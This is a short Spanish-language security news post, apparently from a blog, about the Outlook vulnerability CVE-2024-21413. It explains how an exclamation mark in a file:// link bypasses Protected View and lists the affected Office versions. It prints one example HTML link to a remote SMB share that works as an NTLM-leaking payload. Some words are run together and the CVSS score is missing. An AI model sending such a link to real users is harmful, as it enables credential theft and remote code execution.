Se ha descubierto una vulnerabilidad crítica CVE-2024-21413 en Microsoft Outlook, que permite a los atacantes ejecutar código arbitrario en sistemas remotos. CISA advierte sobre la necesidad urgente de corregir la vulnerabilidad, especialmente para las agencias federales.
⌛ La vulnerabilidad está relacionada con una validación de entrada incorrecta al abrir correos electrónicos con enlaces maliciosos, lo que permite eludir el modo Vista protegida. Los atacantes utilizan el símbolo de exclamación en los enlaces para eludir los mecanismos de seguridad de Outlook.
💡Microsoft ha corregido CVE-2024-21413 (CVSS: en 2024), pero advirtió que la vulnerabilidad sigue activa incluso en modo de vista previa.
Check Point dice que los intrusos utilizan el método de bypass añadiendo a los enlaces de protocolo:
file://
HackUn signo de exclamación y texto aleatorio después de expandir el archivo. Este enfoque le permite eludir los mecanismos de protección de Outlook y descargar contenido malicioso.
🚷 Ejemplo:
<a href="file://\\10.10.111.111\test\test.rtf!something "> CLICK ME </ a >
HTMLHay varias versiones de productos de Microsoft en juego:
- Microsoft Office LTSC 2021.
- Microsoft 365 Apps for Enterprise.
- Microsoft Outlook 2016.
- Microsoft Office 2019.
💡 La explotación exitosa de la vulnerabilidad puede conducir al robo de datos de contabilidad NTLM y a la ejecución de ataques arbitrarios.
S.I Stega Intelligence
Discover more from Stega Intelligence
Subscribe to get the latest posts sent to your email.